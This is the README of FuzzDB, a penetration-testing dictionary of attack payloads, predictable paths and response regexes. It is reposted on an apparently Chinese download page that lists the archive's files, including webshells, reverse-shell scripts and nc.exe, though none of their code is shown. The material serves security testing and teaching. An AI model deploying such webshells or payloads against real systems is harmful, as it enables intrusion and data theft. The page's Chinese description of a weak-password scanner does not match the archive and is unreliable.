FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses.
**Attack Patterns -**
FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing.
These patterns, categorized by attack and where appropriate platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, http header crlf injections, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs than [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).<br>
**Discovery -**
The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths).
FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.<br>
https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery
**Response Analysis -**
Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex).
FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.<br>
**Other useful stuff -**
Webshells in different languages, common password and username lists, and some handy wordlists.
**Documentation -**
Many directories contain a README.md file with usage notes.
A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included. <br>
### Usage tips for pentesting with FuzzDB ###
https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints
### How people use FuzzDB ###
FuzzDB is like an application security scanner, without the scanner.
Some ways to use FuzzDB:
* Website and application service black-box penetration testing with
* [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension
* Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner
* [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy
* To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more
* Inside custom tools for testing software and application protocols
* Crafting security test cases for GUI or command line software with standard test automation tools
* Incorporating into other Open Source software or commercial products
* In training materials and documentation
* To learn about software exploitation techniques
* To improve your security testing product or service
### How were the patterns collected? ###
Many, many hours of research and pentesting. And
* analysis of default app installs
* analysis of system and application documentation
* analysis of error messages
* researching old web exploits for repeatable attack strings
* scraping scanner payloads from http logs
* various books, articles, blog posts, mailing list threads
* other open source fuzzers and pentest tools
and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors
### Places you can find FuzzDB ###
Other security tools and projects that incorporate FuzzzDB in whole or part
* OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
* SecLists https://github.com/danielmiessler/SecLists
* TrustedSec Pentesters Framework https://github.com/trustedsec/ptf
* Rapid7 Metasploit https://github.com/rapid7/metasploit-framework
* Portswigger Burp Suite http://portswigger.net
* Protofuzz https://github.com/trailofbits/protofuzz
* BlackArch Linux https://www.blackarch.org/
* ArchStrike Linux https://archstrike.org/
### Download ###
**Preferred method is to check out sources via git, new payloads are added frequently**
```
git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1
```
While in the FuzzDB dir, you can update your local repo with the command
```
git pull
```
This Stackoverflow gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip)
Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk.
### Who ###
FuzzDB was created by Adam Muntner (amuntner @ gmail.com)
FuzzDB (c) Copyright Adam Muntner, 2010-2019
Portions copyrighted by others, as noted in commit comments and README.md files.
The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know.
Submissions are always welcome!
Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/)
没有合适的资源?快使用搜索试试~ 我知道了~
fuzzdb-master.zip
共396个文件
txt:269个
md:26个
php:23个
需积分: 48 9 下载量 51 浏览量
2021-02-18
16:17:12
上传
评论
收藏 6.06MB ZIP 举报
温馨提示
弱口令检查工具下载(弱口令扫描检测)是可在Windows平台运行使用的弱密码口令检测工具。它支持批量多线程检查。它可以快速检测弱密码,弱密码帐户,密码支持和用户名组合检查,大大提高成功率和支持自定义服务。如果想要检测网络浏览是否安全
资源详情
资源评论
资源推荐
收起资源包目录
fuzzdb-master.zip (396个子文件)
cmd.asmx 2KB
ntdaddy.asp 42KB
proxy.asp 13KB
file.asp 6KB
up.asp 4KB
dns.asp 4KB
shell.asp 3KB
cmdasp.asp 1KB
list.asp 1KB
cmd-asp-5.1.asp 1KB
cmd.asp 923B
shell.aspx 4KB
cmd.aspx 2KB
cmdasp.aspx 1KB
cmd.c 1KB
shell.cfm 4KB
cfExec.cfm 2KB
cfSQL.cfm 2KB
cmd.cfm 807B
perlcmd.cgi 585B
ListServlet.class 2KB
UpServlet.class 2KB
CmdServlet.class 2KB
nc.exe 28KB
uber.gif 898KB
POC_phpinfo-metadata.gif 7KB
POC_img_phpinfo-LF-CR.gif 29B
POC_img_phpinfo-CR.gif 28B
.gitignore 11B
htmlcodes-cheatsheet.htm 29KB
ScriptMapping_Release_26Nov2007.html 190KB
docs.sql_injection_cheatsheet.html 72KB
source-directory-file-indexing-cheatsheet.html 42KB
KL0209LIT_fffap.html 26KB
docs.http-method-defs.html 20KB
rfi-cheatsheet.html 8KB
ListServlet.java 2KB
ListServlet.java 2KB
UpServlet.java 2KB
UpServlet.java 2KB
CmdServlet.java 1KB
CmdServlet.java 1KB
POC_phpinfo-metadata.jpg 74KB
lottapixel.jpg 5KB
browser.jsp 68KB
up.jsp 4KB
up_win32.jsp 4KB
jsp-reverse.jsp 2KB
list.jsp 2KB
cmd.jsp 1KB
cmd.jsp 864B
cmd_win32.jsp 853B
cmdjsp.jsp 725B
simple.jsp 63B
README.md 6KB
regexp-security-cheatsheet.md 5KB
README.md 4KB
README.md 4KB
README.md 3KB
README.md 1KB
README.md 1KB
README.md 953B
README.md 711B
README.md 707B
Readme.md 669B
README.md 492B
README.md 458B
README.md 343B
README.md 272B
README.md 255B
README.md 214B
README.md 173B
README.md 172B
README.md 158B
README.md 121B
README.md 119B
README.md 104B
README.md 85B
README.md 58B
README.md 2B
MANIFEST.MF 67B
Web-Shells-rev2.pdf 164KB
Web-Shells-rev2.pdf 164KB
windows_command_line_sheet_v1.pdf 131KB
netcat_cheat_sheet_v1.pdf 127KB
docs.oracle_cheat.pdf 95KB
Wireshark_Display_Filters.pdf 38KB
shell.php 13KB
shell.php 13KB
proxy.php 11KB
proxy.php 11KB
file.php 6KB
file.php 6KB
php-reverse-shell.php 5KB
php-reverse-shell.php 5KB
dns.php 5KB
dns.php 5KB
host.php 4KB
host.php 4KB
killnc.php 4KB
共 396 条
- 1
- 2
- 3
- 4
黄一113530
- 粉丝: 110
- 资源: 63
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0